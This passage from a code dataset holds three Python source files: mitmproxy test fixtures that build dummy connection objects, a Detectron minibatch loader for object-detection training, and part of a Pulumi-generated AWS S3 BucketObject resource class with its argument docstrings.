tls_extensions=[(0x00, bytes.fromhex(\"000e00000b6578616d\"))],\n state=0,\n sockname=(\"\", 0),\n error=None,\n tls=False,\n certificate_list=[],\n alpn_offers=[],\n cipher_list=[],\n ))\n c.reply = controller.DummyReply()\n return c\n\n\ndef tserver_conn() -> context.Server:\n c = context.Server.from_state(dict(\n id=str(uuid.uuid4()),\n address=(\"address\", 22),\n source_address=(\"address\", 22),\n ip_address=(\"192.168.0.1\", 22),\n timestamp_start=946681202,\n timestamp_tcp_setup=946681203,\n timestamp_tls_setup=946681204,\n timestamp_end=946681205,\n tls_established=True,\n sni=\"address\",\n alpn_proto_negotiated=None,\n tls_version=\"TLSv1.2\",\n via=None,\n state=0,\n error=None,\n tls=False,\n certificate_list=[],\n alpn_offers=[],\n cipher_name=None,\n cipher_list=[],\n via2=None,\n ))\n c.reply = controller.DummyReply()\n c.rfile = io.BytesIO()\n c.wfile = io.BytesIO()\n return c\n\n\ndef terr(content=\"error\"):\n \"\"\"\n @return: mitmproxy.proxy.protocol.primitives.Error\n \"\"\"\n err = flow.Error(content)\n return err\n"} {"ext": "py", "sha": "1a2f7176ed8951d59e04fb3e3c7f06be6530084a", "content": "# Copyright (c) 2017-present, Facebook, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##############################################################################\n#\n# Based on:\n# --------------------------------------------------------\n# Fast R-CNN\n# Copyright (c) 2015 Microsoft\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Ross Girshick\n# --------------------------------------------------------\n\n\"\"\"Construct minibatches for Detectron networks.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport cv2\nimport logging\nimport numpy as np\n\nfrom core.config import cfg,switch_to_teacher,switch_to_student,teacher_cfg\nimport roi_data.fast_rcnn\nimport 
roi_data.retinanet\nimport roi_data.rpn\nimport utils.blob as blob_utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_minibatch_blob_names(is_training=True):\n \"\"\"Return blob names in the order in which they are read by the data loader.\n \"\"\"\n # data blob: holds a batch of N images, each with 3 channels\n blob_names = ['data']\n if cfg.DISTILLATION.DISTILLATION_ON:\n blob_names.append('teacher/data')\n if cfg.RPN.RPN_ON:\n # RPN-only or end-to-end Faster R-CNN\n blob_names += roi_data.rpn.get_rpn_blob_names(is_training=is_training)\n elif cfg.RETINANET.RETINANET_ON:\n blob_names += roi_data.retinanet.get_retinanet_blob_names(\n is_training=is_training\n )\n else:\n # Fast R-CNN like models trained on precomputed proposals\n blob_names += roi_data.fast_rcnn.get_fast_rcnn_blob_names(\n is_training=is_training\n )\n return blob_names\n\n\ndef get_minibatch(roidb):\n \"\"\"Given a roidb, construct a minibatch sampled from it.\"\"\"\n # We collect blobs from each image onto a list and then concat them into a\n # single tensor, hence we initialize each blob to an empty list\n blobs = {k: [] for k in get_minibatch_blob_names()}\n # Get the input image blob, formatted for caffe2\n\n im_blob, im_scales = _get_image_blob(roidb)\n if cfg.DISTILLATION.DISTILLATION_ON:\n teacher_cfg.TRAIN.SCALES=cfg.TRAIN.SCALES\n teacher_cfg.TRAIN.MAX_SIZE=cfg.TRAIN.MAX_SIZE\n teacher_blob,_=_get_image_blob(roidb,cfg=teacher_cfg)\n \n blobs['data'] = im_blob\n\n if cfg.DISTILLATION.DISTILLATION_ON:\n blobs['teacher/data']=teacher_blob\n\n if cfg.RPN.RPN_ON:\n # RPN-only or end-to-end Faster/Mask R-CNN\n valid = roi_data.rpn.add_rpn_blobs(blobs, im_scales, roidb)\n elif cfg.RETINANET.RETINANET_ON:\n im_width, im_height = im_blob.shape[3], im_blob.shape[2]\n # im_width, im_height corresponds to the network input: padded image\n # (if needed) width and height. We pass it as input and slice the data\n # accordingly so that we don't need to use SampleAsOp\n valid = roi_data.retinanet.add_retinanet_blobs(\n blobs, im_scales, roidb, im_width, im_height\n )\n else:\n # Fast R-CNN like models trained on precomputed proposals\n valid = roi_data.fast_rcnn.add_fast_rcnn_blobs(blobs, im_scales, roidb)\n \n return blobs, valid\n\n\ndef _get_image_blob(roidb,cfg=cfg):\n \"\"\"Builds an input blob from the images in the roidb at the specified\n scales.\n \"\"\"\n num_images = len(roidb)\n # Sample random scales to use for each image in this batch\n scale_inds = np.random.randint(\n 0, high=len(cfg.TRAIN.SCALES), size=num_images\n )\n processed_ims = []\n im_scales = []\n teacher_ims=[]\n for i in range(num_images):\n im = cv2.imread(roidb[i]['image'])\n assert im is not None, \\\n 'Failed to read image \\'{}\\''.format(roidb[i]['image'])\n if roidb[i]['flipped']:\n im = im[:, ::-1, :]\n\n target_size = cfg.TRAIN.SCALES[scale_inds[i]]\n\n im, im_scale = blob_utils.prep_im_for_blob(\n im, cfg.PIXEL_MEANS,cfg.PIXEL_DIV,cfg.PIXEL_STD, [target_size], cfg.TRAIN.MAX_SIZE\n )\n\n im_scales.append(im_scale[0])\n processed_ims.append(im[0])\n\n # Create a blob to hold the input images\n\n blob = blob_utils.im_list_to_blob(processed_ims)\n\n return blob, im_scales\n"} {"ext": "py", "sha": "1a2f7261fe1537ec542825018acac13320502ca7", "content": "# coding=utf-8\n# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***\n# *** Do not edit by hand unless you're certain you know what you are doing! 
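# --- Illustrative aside on the Detectron-style `_get_image_blob` above ------
# (unrelated to the generated Pulumi file that follows). `_get_image_blob`
# returns, per image, the scale factor applied when resizing to
# TRAIN.SCALES / TRAIN.MAX_SIZE; any ground-truth boxes expressed in original
# image coordinates must be scaled by the same factor before they are used to
# build RPN / Fast R-CNN targets. A minimal sketch, assuming boxes are an
# (N, 4) float array in (x1, y1, x2, y2) form; the helper name is hypothetical.
import numpy as np  # already imported as np in the module above

def scale_boxes_to_blob(boxes, im_scale):
    """Map boxes from original image coordinates into the resized image blob."""
    return np.asarray(boxes, dtype=np.float32) * float(im_scale)
# ----------------------------------------------------------------------------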
***\n\nimport warnings\nimport pulumi\nimport pulumi.runtime\nfrom typing import Any, Mapping, Optional, Sequence, Union, overload\nfrom .. import _utilities\n\n__all__ = ['BucketObjectArgs', 'BucketObject']\n\n@pulumi.input_type\nclass BucketObjectArgs:\n def __init__(__self__, *,\n bucket: pulumi.Input[str],\n acl: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] = None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None):\n \"\"\"\n The set of arguments for constructing a BucketObject resource.\n :param pulumi.Input[str] bucket: Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n :param pulumi.Input[str] acl: [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n :param pulumi.Input[bool] bucket_key_enabled: Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n :param pulumi.Input[str] cache_control: Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n :param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n :param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n :param pulumi.Input[str] content_disposition: Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n :param pulumi.Input[str] content_encoding: Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. 
Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n :param pulumi.Input[str] content_language: Language the content is in e.g., en-US or en-GB.\n :param pulumi.Input[str] content_type: Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n :param pulumi.Input[str] etag: Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n :param pulumi.Input[bool] force_destroy: Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n :param pulumi.Input[str] key: Name of the object once it is in the bucket.\n :param pulumi.Input[str] kms_key_id: ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n :param pulumi.Input[str] object_lock_legal_hold_status: [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n :param pulumi.Input[str] object_lock_mode: Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n :param pulumi.Input[str] object_lock_retain_until_date: Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n :param pulumi.Input[str] server_side_encryption: Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n :param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: Path to a file that will be read and uploaded as raw bytes for the object content.\n :param pulumi.Input[str] source_hash: Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n :param pulumi.Input[str] storage_class: [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Map of tags to assign to the object. 
If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n :param pulumi.Input[str] website_redirect: Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n if bucket is not None:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"bucket is deprecated: Use the aws_s3_object resource instead\"\"\")\n pulumi.set(__self__, \"bucket\", bucket)\n if acl is not None:\n pulumi.set(__self__, \"acl\", acl)\n if bucket_key_enabled is not None:\n pulumi.set(__self__, \"bucket_key_enabled\", bucket_key_enabled)\n if cache_control is not None:\n pulumi.set(__self__, \"cache_control\", cache_control)\n if content is not None:\n pulumi.set(__self__, \"content\", content)\n if content_base64 is not None:\n pulumi.set(__self__, \"content_base64\", content_base64)\n if content_disposition is not None:\n pulumi.set(__self__, \"content_disposition\", content_disposition)\n if content_encoding is not None:\n pulumi.set(__self__, \"content_encoding\", content_encoding)\n if content_language is not None:\n pulumi.set(__self__, \"content_language\", content_language)\n if content_type is not None:\n pulumi.set(__self__, \"content_type\", content_type)\n if etag is not None:\n pulumi.set(__self__, \"etag\", etag)\n if force_destroy is not None:\n pulumi.set(__self__, \"force_destroy\", force_destroy)\n if key is not None:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"key is deprecated: Use the aws_s3_object resource instead\"\"\")\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if kms_key_id is not None:\n pulumi.set(__self__, \"kms_key_id\", kms_key_id)\n if metadata is not None:\n pulumi.set(__self__, \"metadata\", metadata)\n if object_lock_legal_hold_status is not None:\n pulumi.set(__self__, \"object_lock_legal_hold_status\", object_lock_legal_hold_status)\n if object_lock_mode is not None:\n pulumi.set(__self__, \"object_lock_mode\", object_lock_mode)\n if object_lock_retain_until_date is not None:\n pulumi.set(__self__, \"object_lock_retain_until_date\", object_lock_retain_until_date)\n if server_side_encryption is not None:\n pulumi.set(__self__, \"server_side_encryption\", server_side_encryption)\n if source is not None:\n pulumi.set(__self__, \"source\", source)\n if source_hash is not None:\n pulumi.set(__self__, \"source_hash\", source_hash)\n if storage_class is not None:\n pulumi.set(__self__, \"storage_class\", storage_class)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if website_redirect is not None:\n pulumi.set(__self__, \"website_redirect\", website_redirect)\n\n @property\n @pulumi.getter\n def bucket(self) -> pulumi.Input[str]:\n \"\"\"\n Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n \"\"\"\n return pulumi.get(self, \"bucket\")\n\n @bucket.setter\n def bucket(self, value: pulumi.Input[str]):\n pulumi.set(self, \"bucket\", value)\n\n @property\n @pulumi.getter\n def acl(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. 
Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n \"\"\"\n return pulumi.get(self, \"acl\")\n\n @acl.setter\n def acl(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"acl\", value)\n\n @property\n @pulumi.getter(name=\"bucketKeyEnabled\")\n def bucket_key_enabled(self) -> Optional[pulumi.Input[bool]]:\n \"\"\"\n Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n \"\"\"\n return pulumi.get(self, \"bucket_key_enabled\")\n\n @bucket_key_enabled.setter\n def bucket_key_enabled(self, value: Optional[pulumi.Input[bool]]):\n pulumi.set(self, \"bucket_key_enabled\", value)\n\n @property\n @pulumi.getter(name=\"cacheControl\")\n def cache_control(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n \"\"\"\n return pulumi.get(self, \"cache_control\")\n\n @cache_control.setter\n def cache_control(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"cache_control\", value)\n\n @property\n @pulumi.getter\n def content(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n \"\"\"\n return pulumi.get(self, \"content\")\n\n @content.setter\n def content(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content\", value)\n\n @property\n @pulumi.getter(name=\"contentBase64\")\n def content_base64(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n \"\"\"\n return pulumi.get(self, \"content_base64\")\n\n @content_base64.setter\n def content_base64(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_base64\", value)\n\n @property\n @pulumi.getter(name=\"contentDisposition\")\n def content_disposition(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n \"\"\"\n return pulumi.get(self, \"content_disposition\")\n\n @content_disposition.setter\n def content_disposition(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_disposition\", value)\n\n @property\n @pulumi.getter(name=\"contentEncoding\")\n def content_encoding(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. 
Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n \"\"\"\n return pulumi.get(self, \"content_encoding\")\n\n @content_encoding.setter\n def content_encoding(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_encoding\", value)\n\n @property\n @pulumi.getter(name=\"contentLanguage\")\n def content_language(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Language the content is in e.g., en-US or en-GB.\n \"\"\"\n return pulumi.get(self, \"content_language\")\n\n @content_language.setter\n def content_language(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_language\", value)\n\n @property\n @pulumi.getter(name=\"contentType\")\n def content_type(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n \"\"\"\n return pulumi.get(self, \"content_type\")\n\n @content_type.setter\n def content_type(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_type\", value)\n\n @property\n @pulumi.getter\n def etag(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n \"\"\"\n return pulumi.get(self, \"etag\")\n\n @etag.setter\n def etag(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"etag\", value)\n\n @property\n @pulumi.getter(name=\"forceDestroy\")\n def force_destroy(self) -> Optional[pulumi.Input[bool]]:\n \"\"\"\n Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n \"\"\"\n return pulumi.get(self, \"force_destroy\")\n\n @force_destroy.setter\n def force_destroy(self, value: Optional[pulumi.Input[bool]]):\n pulumi.set(self, \"force_destroy\", value)\n\n @property\n @pulumi.getter\n def key(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Name of the object once it is in the bucket.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"key\", value)\n\n @property\n @pulumi.getter(name=\"kmsKeyId\")\n def kms_key_id(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. 
This provider will only perform drift detection if a configuration value is provided.\n \"\"\"\n return pulumi.get(self, \"kms_key_id\")\n\n @kms_key_id.setter\n def kms_key_id(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"kms_key_id\", value)\n\n @property\n @pulumi.getter\n def metadata(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n \"\"\"\n return pulumi.get(self, \"metadata\")\n\n @metadata.setter\n def metadata(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"metadata\", value)\n\n @property\n @pulumi.getter(name=\"objectLockLegalHoldStatus\")\n def object_lock_legal_hold_status(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n \"\"\"\n return pulumi.get(self, \"object_lock_legal_hold_status\")\n\n @object_lock_legal_hold_status.setter\n def object_lock_legal_hold_status(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_legal_hold_status\", value)\n\n @property\n @pulumi.getter(name=\"objectLockMode\")\n def object_lock_mode(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n \"\"\"\n return pulumi.get(self, \"object_lock_mode\")\n\n @object_lock_mode.setter\n def object_lock_mode(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_mode\", value)\n\n @property\n @pulumi.getter(name=\"objectLockRetainUntilDate\")\n def object_lock_retain_until_date(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n \"\"\"\n return pulumi.get(self, \"object_lock_retain_until_date\")\n\n @object_lock_retain_until_date.setter\n def object_lock_retain_until_date(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_retain_until_date\", value)\n\n @property\n @pulumi.getter(name=\"serverSideEncryption\")\n def server_side_encryption(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Server-side encryption of the object in S3. 
Valid values are \"`AES256`\" and \"`aws:kms`\".\n \"\"\"\n return pulumi.get(self, \"server_side_encryption\")\n\n @server_side_encryption.setter\n def server_side_encryption(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"server_side_encryption\", value)\n\n @property\n @pulumi.getter\n def source(self) -> Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]:\n \"\"\"\n Path to a file that will be read and uploaded as raw bytes for the object content.\n \"\"\"\n return pulumi.get(self, \"source\")\n\n @source.setter\n def source(self, value: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]):\n pulumi.set(self, \"source\", value)\n\n @property\n @pulumi.getter(name=\"sourceHash\")\n def source_hash(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n \"\"\"\n return pulumi.get(self, \"source_hash\")\n\n @source_hash.setter\n def source_hash(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"source_hash\", value)\n\n @property\n @pulumi.getter(name=\"storageClass\")\n def storage_class(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n \"\"\"\n return pulumi.get(self, \"storage_class\")\n\n @storage_class.setter\n def storage_class(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"storage_class\", value)\n\n @property\n @pulumi.getter\n def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of tags to assign to the object. 
If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n \"\"\"\n return pulumi.get(self, \"tags\")\n\n @tags.setter\n def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"tags\", value)\n\n @property\n @pulumi.getter(name=\"websiteRedirect\")\n def website_redirect(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n return pulumi.get(self, \"website_redirect\")\n\n @website_redirect.setter\n def website_redirect(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"website_redirect\", value)\n\n\n@pulumi.input_type\nclass _BucketObjectState:\n def __init__(__self__, *,\n acl: Optional[pulumi.Input[str]] = None,\n bucket: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] = None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n version_id: Optional[pulumi.Input[str]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None):\n \"\"\"\n Input properties used for looking up and filtering BucketObject resources.\n :param pulumi.Input[str] acl: [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n :param pulumi.Input[str] bucket: Name of the bucket to put the file in. 
Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n :param pulumi.Input[bool] bucket_key_enabled: Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n :param pulumi.Input[str] cache_control: Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n :param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n :param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n :param pulumi.Input[str] content_disposition: Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n :param pulumi.Input[str] content_encoding: Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n :param pulumi.Input[str] content_language: Language the content is in e.g., en-US or en-GB.\n :param pulumi.Input[str] content_type: Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n :param pulumi.Input[str] etag: Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n :param pulumi.Input[bool] force_destroy: Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n :param pulumi.Input[str] key: Name of the object once it is in the bucket.\n :param pulumi.Input[str] kms_key_id: ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n :param pulumi.Input[str] object_lock_legal_hold_status: [Legal 